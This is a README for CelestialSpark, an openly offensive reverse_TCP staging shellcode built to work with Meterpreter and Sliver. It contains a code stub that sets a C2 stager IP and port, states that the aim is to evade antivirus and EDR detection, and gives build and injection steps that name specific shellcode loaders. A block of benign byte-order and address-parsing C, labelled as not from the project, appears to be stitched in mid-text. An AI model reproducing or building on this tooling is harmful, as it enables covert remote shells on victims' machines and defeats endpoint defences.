
CelestialSpark

A modern 64-bit position-independent, Meterpreter- and Sliver-compatible reverse_TCP staging shellcode based on Cracked5pider's Stardust.

#include <Common.h>
#include <Constexpr.h>
#pragma comment(lib, "ws2_32.lib")

LPWSTR* arglist;
// Define the IP address of your C2 stager (!)
#define IP_STR  "10.10.10.10"
// Define the TCP port of your stager (443 here)
#define PORT 443
...

Why

I wanted to improve my understanding of position-independent shellcode, plus... my Meterpreter reverse_TCP stager gets caught by a lot of AV/EDRs, and I was hoping to somehow get around the IoCs of the 15-year-old Meterpreter reverse_TCP shellcode generated by msfvenom. Inspirations were:

  • https://github.com/SherifEldeeb/TinyMet
  • https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm

How does it work

  • The missing HTONS and HTONL functions have been hardcoded
  • A custom inet_addr function was rewritten and implemented in Main.c
  • Socket creation and interaction functions are imported from ws2_32.dll
  • The Meterpreter staging logic has been copied from the original project and TinyMet
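The first two points above are about byte order and address parsing. The following is an added illustration of what that means, not code from CelestialSpark, Stardust or TinyMet: hand-rolled htons/htonl for a little-endian host and a validating dotted-quad parser that uses no libc call (the names my_htons, my_htonl, my_inet_addr and parse_addr are assumed, not the project's).

```c
#include <stdint.h>

/* Hand-written byte-order helpers, standing in for the htons/htonl the
   project does not import. They assume a little-endian host (x86-64). */
static uint16_t my_htons(uint16_t v) {
    return (uint16_t)((v << 8) | (v >> 8));
}

static uint32_t my_htonl(uint32_t v) {
    return ((v & 0x000000FFu) << 24) | ((v & 0x0000FF00u) << 8) |
           ((v & 0x00FF0000u) >> 8)  | ((v & 0xFF000000u) >> 24);
}

/* Parse a dotted-quad string such as "10.10.10.10" into a network-byte-order
   32-bit address without any libc call. Returns 0 on success and -1 on
   malformed input: a missing octet, an octet above 255, more than three
   digits in an octet, or trailing characters. */
static int my_inet_addr(const char *s, uint32_t *out) {
    uint32_t addr = 0;
    for (int octet = 0; octet < 4; octet++) {
        uint32_t val = 0;
        int digits = 0;
        while (*s >= '0' && *s <= '9') {
            val = val * 10 + (uint32_t)(*s - '0');
            if (val > 255 || ++digits > 3) return -1;
            s++;
        }
        if (digits == 0) return -1;
        addr = (addr << 8) | val;
        if (octet < 3) {
            if (*s != '.') return -1;
            s++;
        }
    }
    if (*s != '\0') return -1;
    *out = my_htonl(addr);  /* host-order quad -> network order */
    return 0;
}

/* Convenience wrapper: the parsed address as a number, or -1 on failure. */
static long long parse_addr(const char *s) {
    uint32_t a;
    return my_inet_addr(s, &a) == 0 ? (long long)a : -1LL;
}
```

The validation is the part worth keeping: a silent mis-parse of a bad octet turns into a connection attempt to an address nobody intended.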

Usage

  • Git clone the repository
  • Change the IP and port in Main.c
  • Disable the message box shown right before the stage 2 shellcode executes (if it bothers you)
  • Run make
  • Use your favourite shellcode loader/injector. Successfully tested with:
    • https://github.com/Cipher7/ChaiLdr
    • https://github.com/florylsk/ExecIT
    • https://github.com/3xpl01tc0d3r/ProcessInjection
    • the original Stardust Loader written by Cracked5pider